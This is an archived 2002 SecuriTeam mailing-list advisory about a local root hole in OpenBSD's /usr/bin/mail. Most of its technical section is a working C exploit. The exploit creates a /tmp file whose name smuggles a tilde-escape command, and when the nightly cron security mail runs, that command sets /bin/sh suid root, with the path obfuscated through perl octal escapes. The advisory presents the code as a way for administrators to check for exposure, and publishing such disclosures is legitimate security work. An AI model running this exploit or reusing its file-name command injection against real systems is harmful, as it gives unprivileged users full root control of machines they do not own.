[EXPL] /usr/bin/mail OpenBSD Local Root Compromise (Escaping Tilde, Exploit)
From: support@securiteam.comDate: 04/14/02
- Previous message: support@securiteam.com: "[UNIX] /usr/bin/mail OpenBSD Local Root Compromise (Escaping Tilde)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Sun, 14 Apr 2002 22:35:40 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
/usr/bin/mail OpenBSD Local Root Compromise (Escaping Tilde, Exploit)
------------------------------------------------------------------------
SUMMARY
The program /usr/bin/mail is a simple mail user agent that can be used
also in the batch mode, for example to send mail to the administrator when
running cron tasks. There is a local root compromise in all versions of
OpenBSD including OpenBSD Current prior to April 9, 2002 due to a bug in
program /usr/bin/mail. The following is an exploit code that can be used
by administrators to verify whether they are vulnerable or not.
For additional information on this vulnerability, please see our previous
article:
<http://www.securiteam.com/unixfocus/5ZP0G156UK.html> /usr/bin/mail
OpenBSD Local Root Compromise (Escaping Tilde)
DETAILS
Exploit:
/*
* (c) 2002 venglin@freebsd.lublin.pl
*
* OpenBSD 3.0 (before 08 Apr 2002)
* /etc/security + /usr/bin/mail local root exploit
*
* Run the exploit and wait for /etc/daily executed from crontab.
* /bin/sh will be suid root next day morning.
*
* Credit goes to urbanek@openbsd.cz for discovering vulnerability.
*
*/
#include <fcntl.h>
int main(void)
{
int fd;
chdir("/tmp");
fd = open("\n~!chmod +s `perl -e 'print
\"\\057\\142\\151\\156\\057\\163\\150\"'`\n", O_CREAT|O_WRONLY, 04777);
if (fd)
close(fd);
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:venglin@freebsd.lublin.pl>
Przemyslaw Frasunek.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[UNIX] /usr/bin/mail OpenBSD Local Root Compromise (Escaping Tilde)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
